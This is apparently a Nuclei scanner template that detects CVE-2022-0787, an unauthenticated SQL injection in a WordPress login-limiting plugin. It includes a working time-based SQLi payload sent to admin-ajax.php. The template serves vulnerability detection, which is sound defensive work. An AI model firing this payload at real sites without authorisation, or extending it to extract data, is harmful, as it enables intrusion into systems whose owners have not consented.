49 lines
1.9 KiB
YAML
49 lines
1.9 KiB
YAML
id: CVE-2022-0787
|
|
|
|
info:
|
|
name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
|
|
remediation: Fixed in version 5.1
|
|
reference:
|
|
- https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
|
|
- https://wordpress.org/plugins/wp-limit-failed-login-attempts/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0787
|
|
- https://github.com/cyllective/CVEs
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-0787
|
|
cwe-id: CWE-89
|
|
epss-score: 0.04032
|
|
epss-percentile: 0.92073
|
|
cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: limit_login_attempts_project
|
|
product: limit_login_attempts
|
|
framework: wordpress
|
|
tags: time-based-sqli,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 15s
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- duration>=6
|
|
- status_code == 200
|
|
- contains(header, "text/html")
|
|
- contains(body, 'iTotalDisplayRecords')
|
|
condition: and
|
|
# digest: 4a0a0047304502202120fd60a49a9ad2129fa0c1295710b0b3936bd777ef6632dcfee0fbb09e8adb022100a0ab87653ba456f6b9e4a6dc4123ae9a8e976284a60c0ec8d08a06b6a6630794:922c64590222798bb761d5b6d8e72950 |